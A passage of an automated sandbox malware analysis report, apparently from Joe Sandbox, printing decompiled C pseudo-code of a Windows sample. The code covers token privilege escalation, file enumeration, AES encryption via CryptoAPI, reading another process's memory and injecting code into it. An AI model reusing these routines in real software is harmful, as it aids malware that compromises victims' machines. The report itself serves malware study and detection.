    						_t199 = GetProcAddress(_t272,  &_v228);
    						 *0x3b85c8 = _t199;
    						if(_t199 != 0) {
    							goto L4;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}


    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C3D2
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C3F5
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C418
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C43B
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 0039C48A
    • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,?,?), ref: 0039C4BD
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,80000000), ref: 0039C5A5
    • GetLastError.KERNEL32 ref: 0039C5AB
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,80000000,80000000), ref: 0039C5EC
    • CreateProcessAsUserW.KERNEL32(?,00000000,08000424,00000000,00000000,00000000,FFFFFFFF,08000424,00000000,00000044,?), ref: 0039C6F2
    • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0039C783
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 75%
    			E00392450(intOrPtr _a4, signed int* _a8) {
    				signed int _v8;
    				void* _v12;
    				short _v536;
    				char _v736;
    				struct _WIN32_FIND_DATAW _v1328;
    				intOrPtr* _t49;
    				signed int _t50;
    				void* _t52;
    				int _t55;
    				intOrPtr _t57;
    				signed int _t62;
    				signed int _t65;
    				signed int _t69;
    				long _t70;
    				signed int _t72;
    				signed int _t73;
    				signed int _t74;
    				void* _t78;
    				intOrPtr _t86;
    				intOrPtr _t88;
    				intOrPtr _t93;
    				signed int _t96;
    				signed int _t97;
    				void* _t98;
    				void* _t99;
    				void* _t101;
    
    				_t86 =  *0x3b8628; // 0x593938
    				_t97 = 0;
    				_push(0);
    				_push( &_v536);
    				_push(0x105);
    				_push(_a4);
    				_t96 = 0;
    				_v8 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x10))))() == 0) {
    					L22:
    					E0039BB40(_t97);
    					 *_a8 = 0;
    					return 0;
    				} else {
    					_t88 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x1d8))))( &_v536);
    					_t78 = 0x105;
    					_t49 =  &_v536;
    					while( *_t49 != _t97) {
    						_t49 = _t49 + 2;
    						_t78 = _t78 - 1;
    						if(_t78 != 0) {
    							continue;
    						} else {
    							goto L22;
    						}
    						goto L24;
    					}
    					__eflags = _t78 - _t97;
    					if(_t78 == _t97) {
    						goto L22;
    					} else {
    						_t72 = 0x105 - _t78;
    						_t50 = E003A1C50( &_v536, 0x105, L"*.*");
    						__eflags = _t50;
    						if(_t50 < 0) {
    							goto L22;
    						} else {
    							_t52 = FindFirstFileW( &_v536,  &_v1328); // executed
    							_v12 = _t52;
    							__eflags = _t52 - 0xffffffff;
    							if(_t52 == 0xffffffff) {
    								goto L22;
    							} else {
    								__eflags = 0;
    								 *((short*)(_t98 + _t72 * 2 - 0x214)) = 0;
    								do {
    									__eflags = _v1328.dwFileAttributes & 0x00000010;
    									if((_v1328.dwFileAttributes & 0x00000010) != 0) {
    										goto L16;
    									} else {
    										_t96 = _t96 + 1;
    										_t73 = _t96 * 4;
    										_t97 = E003A1D90(_t73, _t97);
    										_t99 = _t99 + 8;
    										__eflags = _t97;
    										if(_t97 != 0) {
    											_t62 = E003A1D90(0x208, 0);
    											_t99 = _t99 + 8;
    											 *(_t73 + _t97 - 4) = _t62;
    											__eflags = _t62;
    											if(__eflags != 0) {
    												E00399090(__eflags,  &_v736, 0x73);
    												_push( &(_v1328.cFileName));
    												_t65 = E003A0C10( *(_t73 + _t97 - 4), 0x105,  &_v736,  &_v536);
    												_t99 = _t99 + 0x1c;
    												__eflags = _t65;
    												if(_t65 < 0) {
    													_t96 = _t96 - 1;
    													_t74 = _t96 * 4;
    													E0039BB40( *((intOrPtr*)(_t74 + _t97)));
    													_t101 = _t99 + 4;
    													_push(_t97);
    													__eflags = _t96;
    													if(_t96 == 0) {
    														E0039BB40();
    														_t99 = _t101 + 4;
    														_t97 = 0;
    														__eflags = 0;
    													} else {
    														_push(_t74);
    														_t69 = E003A1D90();
    														_t99 = _t101 + 8;
    														_t97 = _t69;
    													}
    												}
    												goto L16;
    											}
    										}
    									}
    									L19:
    									_t57 =  *0x3b8628; // 0x593938
    									 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x34))))(_v12);
    									__eflags = _v8;
    									if(_v8 != 0) {
    										 *_a8 = _t96;
    										return _t97;
    									} else {
    										__eflags = _t96;
    										while(_t96 != 0) {
    											_t93 =  *((intOrPtr*)(_t97 + _t96 * 4 - 4));
    											_t96 = _t96 - 1;
    											E0039BB40(_t93);
    											_t99 = _t99 + 4;
    											__eflags = _t96;
    										}
    										goto L22;
    									}
    									goto L24;
    									L16:
    									_t55 = FindNextFileW(_v12,  &_v1328); // executed
    									__eflags = _t55;
    								} while (_t55 != 0);
    								_t70 = GetLastError();
    								__eflags = _t70 - 0x12;
    								if(_t70 == 0x12) {
    									_v8 = 1;
    								}
    								goto L19;
    							}
    						}
    					}
    				}
    				L24:
    			}


    APIs
    • FindFirstFileW.KERNELBASE(?,?,?,00000105,*.*), ref: 003924FB
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 003925D3
    • GetLastError.KERNEL32 ref: 003925DD
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003A0C80(void* __ecx) {
    				char _v8;
    				char _v12;
    				signed int _v16;
    				void* _t37;
    				void* _t39;
    				intOrPtr _t41;
    				intOrPtr _t47;
    				void* _t50;
    				intOrPtr _t59;
    				void* _t65;
    				signed int _t66;
    				signed int _t67;
    				void* _t68;
    				void* _t69;
    				void* _t71;
    
    				_t65 = __ecx;
    				_t1 = _t65 + 0x28; // 0xf003b85
    				_t29 =  *_t1;
    				_t67 = 0;
    				_v12 = 0;
    				_v8 = 0x288;
    				_v16 = 0;
    				if( *_t1 != 0) {
    					E0039BB40(_t29);
    					_t68 = _t68 + 4;
    					 *((intOrPtr*)(__ecx + 0x28)) = 0;
    				}
    				_t50 = E003A1D90(_v8, _t67);
    				_t69 = _t68 + 8;
    				if(_t50 == _t67) {
    					L12:
    					_t66 = _t67;
    					goto L13;
    				} else {
    					_t59 =  *0x3b8628; // 0x593938
    					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1f4))))(_t50,  &_v8); // executed
    					if(_t37 != 0x6f) {
    						L6:
    						_t14 = _t50 + 8; // 0x8
    						_t39 = E0039F720(_t14, 0x194,  &_v12,  &_v16, 0x800c); // executed
    						if(_t39 != 0) {
    							_t41 = E003A1D90(2 + _v16 * 4, _t67);
    							_t71 = _t69 + 8;
    							 *((intOrPtr*)(_t65 + 0x28)) = _t41;
    							if(_t41 == _t67) {
    								goto L7;
    							} else {
    								do {
    									_t22 = _t65 + 0x28; // 0xf003b85
    									E003A0C10( *_t22 + _t67 * 4, 0x100, L"%02X",  *(_t67 + _v12) & 0x000000ff);
    									_t67 = _t67 + 1;
    									_t71 = _t71 + 0x10;
    								} while (_t67 < 0x20);
    								_t25 = _t65 + 0x28; // 0xf003b85
    								 *((short*)( *_t25 + 0x80)) = 0;
    								_t66 = 1;
    								_t67 = 0;
    								L13:
    								_t32 = _v12;
    								if(_v12 != _t67) {
    									E0039BB40(_t32);
    									_t69 = _t69 + 4;
    								}
    								if(_t50 != _t67) {
    									E0039BB40(_t50);
    								}
    								return _t66;
    							}
    						} else {
    							L7:
    							return 0;
    						}
    					} else {
    						_t50 = E003A1D90(_v8, _t50);
    						_t69 = _t69 + 8;
    						if(_t50 == _t67) {
    							goto L12;
    						} else {
    							_t47 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t47 + 0x1f4))))(_t50,  &_v8);
    							goto L6;
    						}
    					}
    				}
    			}


    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • GetAdaptersInfo.IPHLPAPI(00000000,00000288,003A03C4,003A03C4,?,003B0F27,?), ref: 003A0CD5
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 60%
    			E003976E0(void* _a4, int _a8, void* _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
    				char _v8;
    				char _v12;
    				int _v16;
    				int _v20;
    				char _v24;
    				void _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				char _v68;
    				void* _t41;
    				char _t42;
    				intOrPtr _t43;
    				intOrPtr _t46;
    				void* _t50;
    				intOrPtr _t55;
    				void* _t57;
    				void* _t63;
    				intOrPtr _t64;
    				intOrPtr _t67;
    				intOrPtr _t71;
    				intOrPtr _t81;
    				intOrPtr _t84;
    				int _t94;
    
    				_t64 =  *0x3b8628; // 0x593938
    				_t63 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				_v20 = 0;
    				_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x180))))( &_v12, 0, 0, 0x18, 0xf0000000); // executed
    				if(_t41 == 0) {
    					L9:
    					_t42 = _v8;
    					if(_t42 != 0) {
    						_t67 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x15c))))(_t42);
    					}
    					_t43 = _v12;
    					if(_t43 != 0) {
    						_t46 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x178))))(_t43, 0);
    					}
    					 *_a20 = _t63;
    					 *_a24 = _v16;
    					return _v20;
    				}
    				_v68 = 0x208;
    				_v64 = 0x6610;
    				_v60 = 0x20;
    				_t12 = _t63 + 8; // 0x8
    				_t50 = memcpy( &_v56, _a12, _t12 << 2);
    				_push( &_v8);
    				_t71 =  *0x3b8628; // 0x593938
    				_push(1);
    				_push(0);
    				_push(0x2c);
    				_push( &_v68);
    				_push(_t50);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x170))))() != 0) {
    					_t81 =  *0x3b8628; // 0x593938
    					_push(0);
    					_push( &_v24);
    					_push(4);
    					_v24 = 1;
    					_push(_v8);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x17c))))() != 0) {
    						_t55 =  *0x3b8628; // 0x593938
    						_push(0);
    						_push(_a16);
    						_push(1);
    						_push(_v8);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x17c))))() != 0) {
    							_t94 = _a8;
    							_t57 = E003A1D90(_t94, 0); // executed
    							_t63 = _t57;
    							if(_t63 != 0) {
    								memcpy(_t63, _a4, _t94);
    								_t84 =  *0x3b8628; // 0x593938
    								_push( &_v16);
    								_push(_t63);
    								_push(0);
    								_push(1);
    								_push(0);
    								_v16 = _t94;
    								_push(_v8);
    								if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x168))))() == 0) {
    									E0039BB40(_t63);
    									_t63 = 0;
    								} else {
    									_v20 = 1;
    								}
    							}
    						}
    					}
    				}
    				goto L9;
    			}


    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 003977B9
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00396740(void* __ecx, void* _a4) {
    				intOrPtr _v12;
    				char _v20;
    				intOrPtr _v40;
    				void _v44;
    				intOrPtr _v48;
    				char _v108;
    				intOrPtr _v316;
    				char _v356;
    				long _t14;
    				void* _t17;
    				void* _t19;
    				void* _t22;
    				void* _t36;
    
    				_t35 = _a4;
    				_t36 = __ecx;
    				_t14 = NtQueryInformationProcess(_a4, 0,  &_v44, 0x18, 0); // executed
    				if(_t14 < 0) {
    					L5:
    					return 0;
    				} else {
    					_t17 = E00396CD0(_t36, _t35, _v40,  &_v20, 0x10); // executed
    					if(_t17 == 0) {
    						goto L5;
    					} else {
    						_t19 = E00396CD0(_t36, _t35, _v12,  &_v108, 0x40); // executed
    						if(_t19 == 0) {
    							goto L5;
    						} else {
    							_t22 = E00396CD0(_t36, _t35, _v48 + _v12,  &_v356, 0xf8); // executed
    							if(_t22 == 0) {
    								goto L5;
    							} else {
    								return _v316 + _v12;
    							}
    						}
    					}
    				}
    			}


    APIs
    • NtQueryInformationProcess.NTDLL(00003000,00000000,0039C9A1,00000018,00000000,0039C9A1,0039FE81,00000000), ref: 00396768
      • Part of subcall function 00396CD0: ReadProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCD4,?,?,?,00000070,00000000), ref: 00396CF9
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E0039952C() {
    
    				SetUnhandledExceptionFilter(E0039BB6D); // executed
    				return 0;
    			}

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_0000BB6D), ref: 00399531
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 54%
    			E0039F720(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr _a20) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* _t33;
    				intOrPtr _t34;
    				intOrPtr _t35;
    				intOrPtr _t42;
    				intOrPtr _t51;
    				void* _t54;
    				intOrPtr _t55;
    				intOrPtr _t57;
    				intOrPtr _t62;
    				intOrPtr _t68;
    				intOrPtr _t71;
    				intOrPtr _t76;
    
    				_t55 =  *0x3b8628; // 0x593938
    				_v16 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				_t76 = 0;
    				_t54 = 0; // executed
    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x180))))( &_v16, 0, 0, 0x18, 0xf0000000); // executed
    				if(_t33 != 0) {
    					_push( &_v8);
    					_t42 =  *0x3b8628; // 0x593938
    					_push(0);
    					_push(0);
    					_push(_a20);
    					_push(_v16);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x16c))))() != 0) {
    						_push(0);
    						_push(_a8);
    						_t71 =  *0x3b8628; // 0x593938
    						_push(_a4);
    						_push(_v8);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x160))))() != 0) {
    							_push(0);
    							_push( &_v20);
    							_t62 =  *0x3b8628; // 0x593938
    							_push( &_v12);
    							_push(4);
    							_v20 = 4;
    							_push(_v8);
    							if( *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x184))))() != 0) {
    								_t76 = E003A1D90(_v12, 0);
    								if(_t76 != 0) {
    									_t51 =  *0x3b8628; // 0x593938
    									_push(0);
    									_push( &_v12);
    									_push(_t76);
    									_push(2);
    									_push(_v8);
    									if( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x184))))() == 0) {
    										E0039BB40(_t76);
    									} else {
    										_t54 = 1;
    									}
    								}
    							}
    						}
    					}
    				}
    				_t34 = _v8;
    				if(_t34 != 0) {
    					_t68 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x164))))(_t34);
    				}
    				_t35 = _v16;
    				if(_t35 != 0) {
    					_t57 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x178))))(_t35, 0);
    				}
    				 *_a12 = _t76;
    				 *_a16 = _v12;
    				return _t54;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 91%
    			E0039DFB0(void* __ecx, struct HINSTANCE__* _a4, void* _a8) {
    				int _v8;
    				intOrPtr _v12;
    				short _v14;
    				int _v18;
    				char _v20;
    				intOrPtr _v52;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				_Unknown_base(*)()* _v96;
    				_Unknown_base(*)()* _v100;
    				_Unknown_base(*)()* _v104;
    				_Unknown_base(*)()* _v108;
    				_Unknown_base(*)()* _v112;
    				_Unknown_base(*)()* _v116;
    				_Unknown_base(*)()* _v120;
    				_Unknown_base(*)()* _v124;
    				char _v128;
    				long _v132;
    				void _v136;
    				char _v236;
    				char _v436;
    				intOrPtr _t133;
    				intOrPtr _t134;
    				intOrPtr _t135;
    				long _t137;
    				intOrPtr _t138;
    				long _t141;
    				long _t148;
    				intOrPtr _t150;
    				intOrPtr _t152;
    				long _t153;
    				intOrPtr _t156;
    				intOrPtr _t160;
    				intOrPtr _t164;
    				intOrPtr _t168;
    				long _t171;
    				intOrPtr _t172;
    				long _t175;
    				long _t176;
    				long _t178;
    				_Unknown_base(*)()* _t207;
    				long _t208;
    				long _t209;
    				long _t211;
    				long _t217;
    				long _t218;
    				long _t222;
    				long _t224;
    				intOrPtr _t226;
    				intOrPtr _t262;
    				intOrPtr _t263;
    				intOrPtr _t264;
    				intOrPtr _t272;
    				intOrPtr _t276;
    				intOrPtr _t277;
    				intOrPtr _t278;
    				intOrPtr _t291;
    				void* _t306;
    				struct HINSTANCE__* _t307;
    				void* _t310;
    
    				_t222 = 0;
    				_t310 = __ecx;
    				_v8 = 0;
    				if( *((intOrPtr*)(__ecx + 0x6c)) == 0) {
    					memset( &_v136, 0, 0x70);
    					_t226 =  *0x3b8628; // 0x593938
    					_t133 =  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x88))))(0, 0, 0, 0, _t306);
    					 *((intOrPtr*)(_t310 + 0x80)) = _t133;
    					_t134 =  *0x3b8628; // 0x593938
    					_t135 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x88))))(0, 0, 0, 0);
    					 *((intOrPtr*)(_t310 + 0x84)) = _t135;
    					_t272 =  *0x3b8628; // 0x593938
    					_t137 =  *((intOrPtr*)( *((intOrPtr*)(_t272 + 0x88))))(0, 1, 1, 0);
    					_t307 = _a4;
    					 *((intOrPtr*)(_t310 + 0x60)) = _a8;
    					 *(_t310 + 0x88) = _t137;
    					 *((intOrPtr*)(_t310 + 0x5c)) = _t307;
    					_t138 =  *0x3b8628; // 0x593938
    					_t14 = _t138 + 0x8c; // 0x5939c4
    					_a4 = _t14;
    					_t18 = _t310 + 0x80; // 0x828b003b
    					_t141 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 0x100))))( *_t18, _t307,  &_v136, 0, 0, 2));
    					__eflags = _t141;
    					if(_t141 == 0) {
    						L21:
    						_t98 = _t310 + 0x80; // 0x828b003b
    						_t276 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t276 + 0xf8))))( *_t98);
    						_t100 = _t310 + 0x84; // 0xc8
    						_t277 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0xf8))))( *_t100);
    						_t102 = _t310 + 0x88; // 0x3e868
    						_t278 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t278 + 0xf8))))( *_t102);
    						__eflags = _v136;
    						if(_v136 != 0) {
    							_t164 =  *0x3b8628; // 0x593938
    							_t106 = _t164 + 0x8c; // 0x5939c4
    							_a4 = _t106;
    							 *(_a4->i)(_t307, _v136,  *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x100))))(0, 0, 0, 3));
    						}
    						__eflags = _v132;
    						if(_v132 != 0) {
    							_t160 =  *0x3b8628; // 0x593938
    							_t112 = _t160 + 0x8c; // 0x5939c4
    							_a4 = _t112;
    							 *(_a4->i)(_t307, _v132,  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x100))))(0, 0, 0, 3));
    						}
    						__eflags =  *(_t310 + 0x88);
    						if( *(_t310 + 0x88) != 0) {
    							_t156 =  *0x3b8628; // 0x593938
    							_t118 = _t156 + 0x8c; // 0x5939c4
    							_a4 = _t118;
    							 *(_a4->i)(_t307, _v128,  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x100))))(0, 0, 0, 3));
    						}
    						__eflags = _t222;
    						if(_t222 != 0) {
    							_t152 =  *0x3b8628; // 0x593938
    							_t153 = _t152 + 0x6c;
    							__eflags = _t153;
    							_a8 = _t153;
    							 *( *_a8)(_t307, _t222, E0039EA80(), 0x8000);
    						}
    						_t148 = _v8;
    						__eflags = _t148;
    						if(_t148 != 0) {
    							_t150 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x6c))))(_t307, _t148, 0x70, 0x8000);
    						}
    						__eflags = 0;
    						 *(_t310 + 0x8c) = 0;
    						 *(_t310 + 0x90) = 0;
    						 *((intOrPtr*)(_t310 + 0x80)) = 0;
    						 *((intOrPtr*)(_t310 + 0x84)) = 0;
    						 *(_t310 + 0x88) = 0;
    						return 0;
    					} else {
    						_t168 =  *0x3b8628; // 0x593938
    						_t20 = _t168 + 0x8c; // 0x5939c4
    						_a4 = _t20;
    						_t24 = _t310 + 0x84; // 0xc8
    						_t171 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t168 + 0x100))))( *_t24, _t307,  &_v132, 0, 0, 2));
    						__eflags = _t171;
    						if(_t171 == 0) {
    							goto L21;
    						} else {
    							_t172 =  *0x3b8628; // 0x593938
    							_t26 = _t172 + 0x8c; // 0x5939c4
    							_a4 = _t26;
    							_t30 = _t310 + 0x88; // 0x3e868
    							_t175 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x100))))( *_t30, _t307,  &_v128, 0, 0, 2));
    							__eflags = _t175;
    							if(_t175 == 0) {
    								goto L21;
    							} else {
    								_push(0x40);
    								_push(0x3000);
    								_t176 = E0039EA80();
    								_push(_t176);
    								_push(0);
    								_push(_t307);
    								E003A1E80(); // executed
    								_t222 = _t176;
    								__eflags = _t222;
    								if(_t222 == 0) {
    									goto L21;
    								} else {
    									_t178 = E00397B30(_t310, _t307, _t222, E0039E8B0, E0039EA80()); // executed
    									__eflags = _t178;
    									if(__eflags == 0) {
    										goto L21;
    									} else {
    										_v92 = 0;
    										_v88 = 0;
    										_v52 = 0;
    										E00399090(__eflags,  &_v436, 0x6c);
    										_t291 =  *0x3b8628; // 0x593938
    										_a4 =  *((intOrPtr*)( *((intOrPtr*)(_t291 + 0x24))))( &_v436);
    										E00396CB0( &_v236, 0x90);
    										_v124 = GetProcAddress(_a4,  &_v236);
    										E00396CB0( &_v236, 0x91);
    										_v120 = GetProcAddress(_a4,  &_v236);
    										E00396CB0( &_v236, 0x92);
    										_v116 = GetProcAddress(_a4,  &_v236);
    										E00396CB0( &_v236, 0x93);
    										_v112 = GetProcAddress(_a4,  &_v236);
    										E00396CB0( &_v236, 0x94);
    										_v108 = GetProcAddress(_a4,  &_v236);
    										E00396CB0( &_v236, 0xbf);
    										_v96 = GetProcAddress(_a4,  &_v236);
    										E00396CB0( &_v236, 0xc0);
    										_v104 = GetProcAddress(_a4,  &_v236);
    										E00396CB0( &_v236, 0xc1);
    										_t207 = GetProcAddress(_a4,  &_v236);
    										__eflags = _v124;
    										_v100 = _t207;
    										if(_v124 == 0) {
    											goto L21;
    										} else {
    											__eflags = _v120;
    											if(_v120 == 0) {
